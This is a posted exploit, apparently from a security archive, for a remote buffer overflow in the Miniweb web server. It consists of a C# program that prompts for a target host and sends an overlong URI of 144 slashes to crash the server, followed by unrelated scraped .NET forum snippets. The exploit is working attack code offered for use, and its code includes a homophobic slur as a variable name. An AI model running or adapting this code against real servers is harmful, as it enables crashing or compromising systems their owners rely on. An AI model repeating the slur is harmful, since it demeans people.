Miniweb Buffer Overflow



################### Miniweb Remote Buffer Overflow ############################

########By: e.wiZz!

########Site: www.balcansecurity.com

######## Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...
#################################################################

/* BoF when requesting URI longer than 120~ */

using System;
using System.IO;
using System.Net;
using System.Text;

namespace idiot
{
class pf
{
static void Main(string[] args)
{
Console.Write("Enter host:\n");
string site = Console.ReadLine();
string uri = null;
try
{
for (int i = 0; i < 144; i++) { uri += "/"; }
HttpWebRequest request = (HttpWebRequest)
HttpWebRequest.Create(site + uri);
HttpWebResponse response = (HttpWebResponse)

request.GetResponse();

//any response we get means that exploit failed
if (response.GetResponseHeader("Content-Lenght") != "a")
{
Console.WriteLine("Exploit failed");
}

}
catch (Exception gayexception)
{
Console.WriteLine("Cannot connect");
Console.WriteLine("{0}", gayexception.Message);
}
}
}
}



Relevant Pages

  • Re: 401 Unauthorized when accessing basic Authentication site through
    ... Create a NetworkCredentials supplying username and password and set the Credential property on HttpWebRequest. ... static private string SendRequest ... StreamWriter writer=null; ... HttpWebResponse response = request.GetResponse; ...
    (microsoft.public.dotnet.framework.aspnet.security)
  • Re: 401 Unauthorized when accessing basic Authentication site thro
    ... static private string SendRequest ... StreamWriter writer=null; ... HttpWebRequest request = WebRequest.Create; ... HttpWebResponse response = request.GetResponse; ...
    (microsoft.public.dotnet.framework.aspnet.security)
  • Create a Record in .net
    ... XmlDocument xmlDocument = new XmlDocument; ... HttpWebRequest request = ... HttpWebResponse response = request.GetResponse; ... StreamReader responseData = new StreamReader); ...
    (microsoft.public.biztalk.general)
  • Create a xml record
    ... XmlDocument xmlDocument = new XmlDocument; ... HttpWebRequest request = ... HttpWebResponse response = request.GetResponse; ... StreamReader responseData = new StreamReader); ...
    (microsoft.public.dotnet.framework.aspnet)
  • Re: how i search a string with google from a console appliction?
    ... string myQuery = "SampleQuery"; ... // Creating new HttpWebRequest ... // Execute the request ... HttpWebResponse response = myRequest.GetResponse; ...
    (microsoft.public.dotnet.languages.csharp)